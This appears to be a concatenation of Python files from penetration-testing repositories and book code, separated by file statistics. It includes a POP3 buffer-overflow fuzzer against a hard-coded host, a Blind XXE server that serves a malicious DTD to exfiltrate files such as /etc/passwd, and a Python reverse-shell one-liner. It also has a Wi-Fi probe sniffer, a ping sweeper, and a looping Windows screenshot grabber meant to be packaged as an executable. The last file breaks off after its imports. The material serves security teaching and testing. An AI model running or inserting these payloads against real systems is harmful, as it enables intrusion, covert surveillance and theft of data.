lowPrimes = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199, 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 409, 419, 421, 431, 433, 439, 443, 449, 457, 461, 463, 467, 479, 487, 491, 499, 503, 509, 521, 523, 541, 547, 557, 563, 569, 571, 577, 587, 593, 599, 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673, 677, 683, 691, 701, 709, 719, 727, 733, 739, 743, 751, 757, 761, 769, 773, 787, 797, 809, 811, 821, 823, 827, 829, 839, 853, 857, 859, 863, 877, 881, 883, 887, 907, 911, 919, 929, 937, 941, 947, 953, 967, 971, 977, 983, 991, 997]
if num in lowPrimes:
return True
# See if any of the low prime numbers can divide num
for prime in lowPrimes:
if (num % prime == 0):
return False
# If all else fails, call rabinMiller() to determine if num is a prime.
return rabinMiller(num)
def generateLargePrime(keysize=1024):
# Return a random prime number of keysize bits in size.
while True:
num = random.randrange(2**(keysize-1), 2**(keysize))
if isPrime(num):
return num | 42.241935 | 828 | 0.566791 |
Hands-On-Penetration-Testing-with-Python | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Project.auth_parameters'
db.add_column(u'xtreme_server_project', 'auth_parameters',
self.gf('django.db.models.fields.TextField')(default='Not Set'),
keep_default=False)
# Adding field 'Project.auth_mode'
db.add_column(u'xtreme_server_project', 'auth_mode',
self.gf('django.db.models.fields.TextField')(default='Not Set'),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Project.auth_parameters'
db.delete_column(u'xtreme_server_project', 'auth_parameters')
# Deleting field 'Project.auth_mode'
db.delete_column(u'xtreme_server_project', 'auth_mode')
models = {
u'xtreme_server.form': {
'Meta': {'object_name': 'Form'},
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'form_action': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'form_content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'form_method': ('django.db.models.fields.CharField', [], {'default': "'GET'", 'max_length': '10'}),
'form_name': ('django.db.models.fields.CharField', [], {'max_length': '512', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_field_list': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"})
},
u'xtreme_server.inputfield': {
'Meta': {'object_name': 'InputField'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_type': ('django.db.models.fields.CharField', [], {'default': "'input'", 'max_length': '256', 'blank': 'True'})
},
u'xtreme_server.learntmodel': {
'Meta': {'object_name': 'LearntModel'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'learnt_model': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Page']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'query_id': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.page': {
'Meta': {'object_name': 'Page'},
'URL': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'connection_details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'status_code': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'xtreme_server.project': {
'Meta': {'object_name': 'Project'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'auth_parameters': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
'login_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'logout_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'password': ('django.db.models.fields.TextField', [], {}),
'password_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'project_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'query_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'start_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Not Set'", 'max_length': '50'}),
'username': ('django.db.models.fields.TextField', [], {}),
'username_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"})
},
u'xtreme_server.settings': {
'Meta': {'object_name': 'Settings'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'password': ('django.db.models.fields.TextField', [], {}),
'username': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.vulnerability': {
'Meta': {'object_name': 'Vulnerability'},
'auth': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msg': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'msg_type': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
're_attack': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'timestamp': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'url': ('django.db.models.fields.TextField', [], {'blank': 'True'})
}
}
complete_apps = ['xtreme_server'] | 63.678261 | 130 | 0.53933 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
import socket
buffer=["A"]
counter=100
string="""Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds"""
if 1:
print"Fuzzing PASS with %s bytes" % len(string)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.250.158',110))
data=s.recv(1024)
#print str(data)
s.send('USER root\r\n')
data=s.recv(1024)
print str(data)
s.send('PASS ' + string + '\r\n')
data=s.recv(1024)
print str(data)
print "done"
#s.send('QUIT\r\n')
#s.close()
| 125.074074 | 2,915 | 0.937114 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Simple Blind XXE server intended to handle incoming requests for
# malicious DTD file, that will subsequently ask for locally stored file,
# like file:///etc/passwd.
#
# This program has been tested with PlayFramework 2.1.3 XXE vulnerability,
# to be run as follows:
#
# 0. Configure global variables: SERVER_SOCKET and RHOST
#
# 1. Run the below script, using:
# $ python blindxxe.py [options] <filepath>
#
# where <filepath> can be for instance: "file:///etc/passwd"
#
# 2. Then, while server is running - invoke XXE by requesting e.g.
# $ curl -X POST http://vulnerable/app --data-binary \
# $'<?xml version="1.0"?><!DOCTYPE foo SYSTEM "http://attacker/test.dtd"><foo>&exfil;</foo>'
#
# The expected result will be like the following:
#
# $ python blindxxe.py
# Exfiltrated file:///etc/passwd:
# ------------------------------
# root:x:0:0:root:/root:/bin/sh
# nobody:x:65534:65534:nobody:/nonexistent:/bin/false
# user:x:1000:50:Linux User,,,:/home/user:/bin/sh
# play:x:100:65534:Linux User,,,:/var/www/play/:/bin/false
# mysql:x:101:65534:Linux User,,,:/home/mysql:/bin/false
#
#
# Mariusz Banach, 2016
#
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import urllib
import re
import sys
import time
import socket
import argparse
import threading
#
# CONFIGURE THE BELOW VARIABLES
#
config = {
'debug' : '',
'listen' : '0.0.0.0',
'port' : 8080,
'rhost' : '',
'exfil-file' : '',
}
EXFILTRATED_EVENT = threading.Event()
def dbg(x):
if config['debug']:
print('[dbg] {}'.format(x))
class BlindXXEServer(BaseHTTPRequestHandler):
method = ''
def response(self, **data):
code = data.get('code', 200)
content_type = data.get('content_type', 'text/plain')
body = data.get('body', '')
self.send_response(code)
self.send_header('Content-Type', content_type)
self.end_headers()
self.wfile.write(body.encode('utf-8'))
self.wfile.close()
def do_GET(self):
self.method = 'GET'
self.request_handler(self)
def do_POST(self):
self.method = 'POST'
self.request_handler(self)
def log_message(self, format, *args):
return
def request_handler(self, request):
global EXFILTRATED_EVENT
print('[.] Incoming HTTP request from {}: {} {}'.format(
self.client_address[0],
request.method,
request.path[:25]
))
path = urllib.unquote(request.path).decode('utf8')
m = re.search('\/\?exfil=(.*)', path, re.MULTILINE)
if m and request.command.lower() == 'get':
data = path[len('/?exfil='):]
print('\n[+] Exfiltrated %s:' % config['exfil-file'])
print('-' * 30)
print(urllib.unquote(data).decode('utf8'))
print('-' * 30 + '\n')
self.response(body='true')
EXFILTRATED_EVENT.set()
elif request.path.endswith('.dtd'):
dbg('Sending malicious DTD file.')
dtd = '''<!ENTITY %% param_exfil SYSTEM "%(exfil_file)s">
<!ENTITY %% param_request "<!ENTITY exfil SYSTEM 'http://%(exfil_host)s:%(exfil_port)d/?exfil=%%param_exfil;'>">
%%param_request;''' % {
'exfil_file' : config['exfil-file'],
'exfil_host' : config['rhost'],
'exfil_port' : config['port']
}
self.response(content_type='text/xml', body=dtd)
else:
dbg('%s %s' % (request.command, request.path))
self.response(body='false')
def parseOptions(argv):
global config
print('''
:: Blind-XXE attacker's helper backend component
Helps exfiltrate files by abusing out-of-bands XML External Entity vulnerabilities.
Mariusz Banach / mgeeky '16-18, <[email protected]>
''')
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <file>')
parser.add_argument('file', type=str, metavar='FILE', default='file:///etc/passwd', help = 'Specifies file to exfiltrate using Blind XXE technique.')
parser.add_argument('-l', '--listen', default='0.0.0.0', help = 'Specifies interface address to bind the HTTP server on / listen on. Default: 0.0.0.0 (all interfaces)')
parser.add_argument('-p', '--port', metavar='PORT', default='8080', type=int, help='Specifies the port to listen on. Default: 8080')
parser.add_argument('-r', '--rhost', metavar='HOST', default=config['rhost'], help='Specifies attackers host address where the victim\'s XML parser should refer while fetching external entities')
parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.')
args = parser.parse_args()
config['debug'] = args.debug
config['listen'] = args.listen
config['port'] = int(args.port)
config['rhost'] = args.rhost
config['exfil-file'] = args.file
print('[::] File to be exfiltrated: "{}"'.format(args.file))
port = int(args.port)
if port < 1 or port > 65535:
Logger.err("Invalid port number. Must be in <1, 65535>")
sys.exit(-1)
return args
def fetchRhost():
global config
config['rhost'] = socket.gethostbyname(socket.gethostname())
def main(argv):
global config
fetchRhost()
opts = parseOptions(argv)
if not opts:
Logger.err('Options parsing failed.')
return False
print('[+] Serving HTTP server on: ("{}", {})'.format(
config['listen'], config['port']
))
dbg('RHOST set to: {}'.format(config['rhost']))
rhost = config['listen']
if config['listen'] == '0.0.0.0':
rhost = config['rhost']
print('\n[>] Here, use the following XML to leverage Blind XXE vulnerability:')
print('''
===
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://{}:{}/test.dtd">
<foo>&exfil;</foo>
===
PS: Don't forget to set:
Content-Type: text/xml
'''.format(rhost, config['port']))
server = HTTPServer((config['listen'], config['port']), BlindXXEServer)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
while not EXFILTRATED_EVENT.is_set():
pass
print('[+] File has been exfiltrated. Quitting.')
if __name__ == '__main__':
main(sys.argv)
| 28.783019 | 199 | 0.606051 |
PenetrationTestingScripts | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 18-5-14
# @File : poc_scanner.py
# @Desc : =_=!!
import sched
import time
import datetime
from multiprocessing import Pool, Lock
from threading import RLock
from pocsuite.api.cannon import Cannon
from apscheduler.schedulers.blocking import BlockingScheduler
from bson.objectid import ObjectId
from fuxi.views.lib.mongo_db import connectiondb, db_name_conf
from fuxi.views.lib.parse_target import parse_target
from instance import config_name
config_db = db_name_conf()['config_db']
tasks_db = db_name_conf()['tasks_db']
vul_db = db_name_conf()['vul_db']
plugin_db = db_name_conf()['plugin_db']
schedule = sched.scheduler(time.time, time.sleep)
lock = Lock()
thread_lock = RLock()
def verify_poc(scan_data):
plugin_name = scan_data['plugin_name']
plugin_filename = scan_data['plugin_filename']
target = scan_data['target']
info = {"pocname": plugin_name,
"pocstring": open(plugin_filename, 'r').read(),
"mode": 'verify'
}
try:
invoker = Cannon(target, info)
result = invoker.run()
if result[-3][0] == 1:
scan_result = {
"plugin_filename": scan_data['plugin_filename'],
"plugin_name": scan_data['plugin_name'],
"plugin_id": scan_data['plugin_id'],
"plugin_type": scan_data['plugin_type'],
"plugin_app": scan_data['plugin_app'],
"plugin_version": scan_data['plugin_version'],
"target": scan_data['target'],
"task_id": scan_data['task_id'],
"task_name": scan_data['task_name'],
"scan_result": result[-1],
"date": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
"tag": ""
}
connectiondb(vul_db).insert(scan_result)
except Exception as e:
raise e
class PocsuiteScanner:
def __init__(self, task_id):
self.task_id = task_id
self.tasks_db_cursor = connectiondb(tasks_db).find_one({"_id": self.task_id})
self.target_list = parse_target(self.tasks_db_cursor['scan_target'])
self.plugin_id_list = self.tasks_db_cursor['plugin_id']
self.result_tmp = []
self.result = []
self.processes = connectiondb(config_db).find_one({"config_name": config_name})['poc_thread']
def set_scanner(self):
connectiondb(tasks_db).update_one({'_id': ObjectId(self.task_id)}, {'$set': {'task_status': 'Processing'}})
if connectiondb(vul_db).find_one({"task_id": self.task_id}):
connectiondb(vul_db).update({'task_id': self.task_id}, {"$set": {"tag": "delete"}}, multi=True)
pool_scanner = Pool(processes=self.processes)
for target in self.target_list:
for plugin_id in self.plugin_id_list:
plugin_cursor = connectiondb(plugin_db).find_one({"_id": ObjectId(plugin_id)})
scan_data = {
"plugin_filename": plugin_cursor['plugin_filename'].encode("UTF-8"),
"plugin_name": plugin_cursor['plugin_name'].encode("UTF-8"),
"plugin_id": plugin_cursor['_id'],
"plugin_type": plugin_cursor['plugin_type'],
"plugin_app": plugin_cursor['plugin_app'],
"plugin_version": plugin_cursor['plugin_version'],
"target": target,
"task_id": self.task_id,
"task_name": self.tasks_db_cursor['task_name'],
}
pool_scanner.apply_async(verify_poc, (scan_data,))
pool_scanner.close()
pool_scanner.join()
connectiondb(tasks_db).update_one({'_id': ObjectId(self.task_id)}, {
'$set': {
'task_status': 'Completed',
'end_date': time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
}
})
class PoCScannerLoop:
def __init__(self):
self.recursion = ''
self.status = ''
self.task_id = ''
self.end_date = ''
def task_schedule(self):
scheduler = BlockingScheduler()
try:
scheduler.add_job(self._get_task, 'interval', seconds=30)
scheduler.start()
except Exception as e:
print(e)
def _get_task(self):
# while thread_lock:
for task_info in connectiondb(tasks_db).find():
self.recursion = int(task_info['task_recursion'])
self.task_id = task_info['_id']
self.status = task_info['task_status']
self.end_date = task_info['end_date']
if self.recursion == 0:
pass
# every day task
if self.recursion == 1:
if "Processing" in self.status:
pass
else:
start_date = datetime.datetime.strptime(self.end_date, "%Y-%m-%d %H:%M:%S")
plan_time = (datetime.datetime.now() - start_date).total_seconds()
if plan_time > 60 * 60 * 24:
print("Every day recursion start......")
scanner = PocsuiteScanner(self.task_id)
scanner.set_scanner()
# every week task
elif self.recursion == 7:
if "Processing" in self.status:
pass
else:
start_date = datetime.datetime.strptime(self.end_date, "%Y-%m-%d %H:%M:%S")
plan_time = (datetime.datetime.now() - start_date).total_seconds()
if plan_time > 60 * 60 * 24 * 7:
print("Every week start...")
scanner = PocsuiteScanner(self.task_id)
scanner.set_scanner()
# every month task
elif self.recursion == 30:
if "Processing" in self.status:
pass
else:
start_date = datetime.datetime.strptime(self.end_date, "%Y-%m-%d %H:%M:%S")
plan_time = (datetime.datetime.now() - start_date).total_seconds()
if plan_time > 60 * 60 * 24 * 30:
print("Every month start...")
scanner = PocsuiteScanner(self.task_id)
scanner.set_scanner()
if __name__ == '__main__':
loop_scanner = PoCScannerLoop()
| 38.490909 | 115 | 0.524021 |
Penetration-Testing-Study-Notes | # Reverse shell one-liner python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
| 63 | 220 | 0.686275 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
from scapy.all import *
interface = 'mon0'
probeReqs = []
def sniffProbe(p):
if p.haslayer(Dot11ProbeReq):
netName = p.getlayer(Dot11ProbeReq).info
if netName not in probeReqs:
probeReqs.append(netName)
print '[+] Detected New Probe Request: ' + netName
sniff(iface=interface, prn=sniffProbe)
| 19.315789 | 62 | 0.636364 |
cybersecurity-penetration-testing | import os
import collections
import platform
import socket, subprocess,sys
import threading
from datetime import datetime
''' section 1 '''
net = raw_input("Enter the Network Address ")
net1= net.split('.')
a = '.'
net2 = net1[0]+a+net1[1]+a+net1[2]+a
st1 = int(raw_input("Enter the Starting Number "))
en1 = int(raw_input("Enter the Last Number "))
en1 =en1+1
dic = collections.OrderedDict()
#dic = collections.OrderedDict()
oper = platform.system()
if (oper=="Windows"):
ping1 = "ping -n 1 "
elif (oper== "Linux"):
ping1 = "ping -c 1 "
else :
ping1 = "ping -c 1 "
t1= datetime.now()
'''section 2'''
class myThread (threading.Thread):
def __init__(self,st,en):
threading.Thread.__init__(self)
self.st = st
self.en = en
def run(self):
run1(self.st,self.en)
'''section 3'''
def run1(st1,en1):
#print "Scanning in Progess"
for ip in xrange(st1,en1):
#print ".",
addr = net2+str(ip)
comm = ping1+addr
response = os.popen(comm)
for line in response.readlines():
if(line.count("TTL")):
break
if (line.count("TTL")):
#print addr, "--> Live"
dic[ip]= addr
''' Section 4 '''
total_ip =en1-st1
tn =20 # number of ip handled by one thread
total_thread = total_ip/tn
total_thread=total_thread+1
threads= []
try:
for i in xrange(total_thread):
en = st1+tn
if(en >en1):
en =en1
thread = myThread(st1,en)
thread.start()
threads.append(thread)
st1 =en
except:
print "Error: unable to start thread"
print "\tNumber of Threads active:", threading.activeCount()
for t in threads:
t.join()
print "Exiting Main Thread"
dict = collections.OrderedDict(sorted(dic.items()))
for key in dict:
print dict[key],"-->" "Live"
t2= datetime.now()
total =t2-t1
print "scanning complete in " , total | 21.934211 | 60 | 0.660735 |
Penetration_Testing |
'''
Suggestion:
Use py2exe to turn this script into a Windows executable.
Example: python setup.py py2exe
Run as administrator to store file under current path.
Change pathname if administrator level privilege is not possible.
Ways to improve program:
* Compress files to reduce size.
'''
import win32gui
import win32ui
import win32con
import win32api
import time
import itertools
def win_screenshot_taker():
while True:
for i in itertools.count():
# Grab a handle to the main desktop window
fg_window = win32gui.GetDesktopWindow()
# Determine the size of all monitors in pixels
width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)
height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)
# Create a device context
desktop_dc = win32gui.GetWindowDC(fg_window)
img_dc = win32ui.CreateDCFromHandle(desktop_dc)
# Create a memory-based device context
mem_dc = img_dc.CreateCompatibleDC()
# Create a bitmap object
screenshot = win32ui.CreateBitmap()
screenshot.CreateCompatibleBitmap(img_dc, width, height)
mem_dc.SelectObject(screenshot)
# Copy the screen into our memory device context
mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY)
# Save the bitmap to a file
screenshot.SaveBitmapFile(mem_dc, "c:\\WINDOWS\\Temp\\screenshot{}.bmp".format(i))
# Free our objects
mem_dc.DeleteDC()
win32gui.DeleteObject(screenshot.GetHandle())
time.sleep(3)
win_screenshot_taker()
| 25.193548 | 85 | 0.748614 |
owtf | """
ACTIVE Plugin for Testing for Web Application Fingerprint (OWASP-IG-004)
https://www.owasp.org/index.php/Testing_for_Web_Application_Fingerprint_%28OWASP-IG-004%29
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Active probing for fingerprint analysis"
def run(PluginInfo):
resource = get_resources("ActiveFingerPrint")
Content = plugin_helper.CommandDump(
"Test Command", "Output", resource, PluginInfo, []
) # No previous output
return Content
| 31 | 90 | 0.747698 |
cybersecurity-penetration-testing | # Prime Number Sieve
# http://inventwithpython.com/hacking (BSD Licensed)
import math
def isPrime(num):
# Returns True if num is a prime number, otherwise False.
# Note: Generally, isPrime() is slower than primeSieve().
# all numbers less than 2 are not prime
if num < 2:
return False
# see if num is divisible by any number up to the square root of num
for i in range(2, int(math.sqrt(num)) + 1):
if num % i == 0:
return False
return True
def primeSieve(sieveSize):
# Returns a list of prime numbers calculated using
# the Sieve of Eratosthenes algorithm.
sieve = [True] * sieveSize
sieve[0] = False # zero and one are not prime numbers
sieve[1] = False
# create the sieve
for i in range(2, int(math.sqrt(sieveSize)) + 1):
pointer = i * 2
while pointer < sieveSize:
sieve[pointer] = False
pointer += i
# compile the list of primes
primes = []
for i in range(sieveSize):
if sieve[i] == True:
primes.append(i)
return primes
| 24.333333 | 73 | 0.587357 |
cybersecurity-penetration-testing | import socket
import struct
